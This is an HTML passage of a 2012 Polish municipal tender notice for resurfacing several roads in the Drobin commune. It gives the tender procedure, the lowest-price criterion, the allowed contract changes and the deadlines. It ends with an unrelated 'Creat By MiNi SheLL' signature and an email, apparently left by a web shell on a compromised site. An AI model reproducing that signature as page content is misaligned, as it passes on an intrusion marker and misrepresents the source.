<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadkach
1) gdy konieczność zmiany, w tym w zakresie wysokości wynagrodzenia, związana jest ze zmianą powszechnie obowiązujących przepisów prawa (np. w zakresie zmiany wysokości stawki podatku VAT)
2) konieczności zmiany terminu realizacji w związku z
a) koniecznością wprowadzenia zmian w dokumentacji projektowej, a wynikających z konieczności dostosowania zakresu zadania do wytycznych programowych lub powszechnie obowiązujących przepisów prawa lub
b)z brakiem możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych lub
c) działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego lub
d) nieterminowym, z przyczyn niezależnych od Wykonawcy, przekazania przez Zamawiającego terenu budowy Wykonawcy lub
     e) wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę lub
f) opóźnieniem związanym z uzyskiwaniem przez Wykonawcę niezbędnych w myśl ustawy Prawo budowlane dokumentów lub
g) innymi okolicznościami niepowstałymi z winy Wykonawcy lub
h) koniecznością wykonania zamówień dodatkowych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.drobin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Drobin, 09-210 Drobin , ul. Piłsudskiego 12..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.06.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy Drobin, 09-210 Drobin , ul. Piłsudskiego 12, pokój 115 ( sekretariat ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Roboty budowlane Współfinansowane z Europejskiego  Funduszu Rozwoju Regionalnego w ramach projektu  Modernizacja  i  przebudowa  dróg w Gminach  regionu  płockiego  szansą  ich  dynamicznego  rozwoju  
      w tym 
      a)  Przebudowa drogi gminnej  relacji Drobin - Dobrosielice - Kowalewo na odcinku od km 1+00.00  do km 5+046 ( II warstwa ścieralna ) z wyłączeniem robót ujętych w pkt. 2.4. przedmiaru robót które polegają na wykonaniu nawierzchni z mieszanek mineralno - asfaltowych , warstwa wyrównawcza , grubość warstwy po zagęszczeniu 1 cm  - m2 20230,00 
 
  b)  Przebudowa drogi gminnej Nr 290535 Cieszewo - Maliszewko ( II warstwa ścieralna ) 

      c)  Modernizacja drogi gminnej Stanisławowo - Cieszewko od  km 0+000 do km 1+200  ( II warstwa ścieralna )
 
      d)  Przebudowa drogi gminnej  relacji Nagórki Dobrskie - Maliszewko  na odcinku od km 0+000 do km 5+730  oraz od km 6+700 do km 7+586,03  ( II warstwa ścieralna )

      e)Wykonanie i montaż tablic pamiątkowych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com